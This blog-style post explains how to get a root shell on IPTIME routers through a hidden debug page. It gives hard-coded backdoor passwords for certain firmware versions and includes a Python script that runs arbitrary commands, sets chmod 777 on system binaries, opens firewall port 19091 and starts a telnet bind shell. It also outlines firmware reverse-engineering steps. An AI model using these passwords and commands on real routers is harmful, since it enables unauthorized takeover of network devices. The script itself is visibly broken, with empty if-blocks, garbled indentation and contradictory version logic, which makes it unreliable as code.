Getting shell access to your IPTIME router

This article in a nutshell

  • How to hack your iptime router and get complete access to its function
  • Works up to firmware v9.27
  • You need administrator password to do anything
  • The default administrator account for iptime is username admin / password admin
  • You can’t hack other people’s router with this as you need the admin account anyway, not to mention it’s illegal in Korea 😉


IPTIME Is a popular router brand in Korea. You can’t ssh to it, you can’t telnet to it. But they have a backdoor where you can get shell access via the web interface…

How to access this

Check your firmware version, if the version is <= 9.12, the password is #notenoughmineral^, if the version is > 9.12 upto 9.27, it’s !@dnjsrurelqjrm*&. If newer, I don’t know the password yet.

Login to your router, note the second part of the URL, is it cgi-bin or sess-bin?

Go to http://<your router ip>/<second part above/d.cgi?aaksldkfj=<the password>

You should see a screen similar to above. Congrats, you got shell access to your router.

How to automate this

Install python3 and run this script

import requests
import sys

pass_old = '#notenoughmineral^'
pass_new = '!@dnjsrurelqjrm*&'

## file changed!
userid = ''
userpw = ''

_Passname = 'aaksjdkfj'
_Passkey = ''

_dest = '/sess-bin/d.cgi'
_setdest = '/sess-bin/timepro.cgi'

_startParam = {_Passname : _Passkey }
_commandParam = {'act':'1','fname':'','cmd':''}

_enable = 'tmenu=sysconf&smenu=misc&act=remote_support&commit=&hostname=&autosaving=1&fakedns=0&nologin=0&wbm_popup=0&upnp=1&led_flag=0&ispfake=0&newpath=&remote_support=1&apcplan=1'
_disable = 'tmenu=sysconf&smenu=misc&act=remote_support&commit=&hostname=&autosaving=1&fakedns=0&nologin=0&wbm_popup=0&upnp=1&led_flag=0&ispfake=0&newpath=&remote_support=0&apcplan=1'

### chmod disabled!
_telnet_check = 'ls -al /sbin'
_permission_enable = '/bin/chmod 777 /sbin/iptables'
_permission_enable2 = '/bin/chmod 777 /sbin/utelnetd'
_telnet_enable_1 = '/sbin/iptables -A INPUT -p tcp --dport 19091 -j ACCEPT'
#_telnet_enable_1 = '/sbin/iptables -A INPUT -p tcp -m -tcp --dport 2323 -j ACCEPT'
_get_iptables = '/sbin/iptables --list'
_telnet_enable_2 = '/sbin/utelnetd -p 19091'
_demon_mode = 'cat /default/var/boa_vh.conf'

sess = requests.session()

def get(args):
    return sess.get(url='http://%s%s' % (sys.argv[1], _dest), params=args).text

def startup():
    x = _startParam.copy()
    if get(x).find('Command Name : ') == -1:
        print ("[x] Not vulnerable machine! cannot access debugging page.")
    print ("[o] Debugging page exist!")

def deleteChunk(ref):
    findx = ref.find('<font size=-1>')
    ref = ref[findx:]
    ref = ref.replace('<font size=-1>','')
    ref = ref.replace('\n</font><br>','')
    return ref

def bind_shell():
    x =_commandParam.copy()
    x['cmd'] = _telnet_check
    ref = get(x)
    findx = ref.find('<font size=-1>')
    ref = ref[findx:]
    ref = ref.replace('<font size=-1>','')
    ref = ref.replace('\n</font><br>','')
    if ref.find('utelnetd') == -1:
        print ('[x] OOPS! Could not found telnet demon.')
        print ('[x] no exploitable -.-')
    x['cmd'] = _demon_mode
    ref = deleteChunk(get(x))
    if ref.find('root') == -1:
        print ('[x] OOPS! httpd demon is not running at root.')
        print ('[x] no exploitable -.-')
        print ('[!] Exploitable! we start working...')
        x =_commandParam.copy()
        sys.stdout.write('[!] Setting up iptables... ')
        x['cmd'] = _telnet_enable_1
        ref = get(x)
        x['cmd'] = _get_iptables
        ref = deleteChunk(get(x))
        if ref.find('19091') == -1 :
        print ('')
        print ('[!] Working telnet demon server...')
        x['cmd'] = _telnet_enable_2
        print ('[o] Binding shell command executed. check it yourself. (port:19091)')

def showcmd(cmd):
    x = _commandParam.copy()
    x['cmd'] = cmd
    ref = get(x)
    t = deleteChunk(ref)
    if t == '>' : return()
    print (t)

if __name__ == '__main__':

    print ('[] - Directiry Debugging IPTIME python module - command eXecuter!')
    print ('Support : IPTIME 7.?? - 9.72')
    print ('Copyright :\n')
    print ('firmware_version : (~ 9.12 = 0) / (9.14 ~ 9.72 = 1)')
    print ('Type "exit" to exit, "bind-shell" to bind telnet connection to port 2323. (deprecated)')

    if len(sys.argv) < 3:
        print ('\n>>> python3 hostname firmware_version [userid] [userpw]\n')
        print('firmware_version : (~ 9.12 = 0) / (9.14 ~ 9.72 = 1)')

    sys.argv[1] = sys.argv[1].replace('http://','')
    sys.argv[1] = sys.argv[1].replace('/','')

    if int(sys.argv[2]) is 0:
        _Passkey = pass_old
        _Passkey = pass_new

        userid = sys.argv[3]
        userpw = sys.argv[4]
        sess.auth = (userid, userpw)

    _commandParam['aaksjdkfj'] = _Passkey

    while True:
        sys.__stdout__.write (sys.argv[1] + '> ')
        x = input()
        if x == 'exit': exit(0)
        elif x == 'bind-shell': bind_shell()
        elif x != '' : showcmd(x)

How did people find this


  1. Download the firmware from IP Time’s website
  2. Extract the firmware with binwalk
  3. Extract the squashfs file inside the bundle
  4. Disassemble timepro.cgi (d.cgi is a link to timepro.cgi)
  5. Find “remote support” function
  6. The password should be nearby

How I tried it for more modern IPTIME routers

I did everything swimmingly up until step 4, I can’t find “remote support” on newer firmware (10.02) for the router A1004V I’m working on 🙁

Instead of IDA for Windows, I used ghidra, a disassembly framework by the NSA (thanks, NSA!). It’s free and very feature complete 🙂


Very nice UI eh? When I have time I’ll dig into it more, it’s probably still there somewhere

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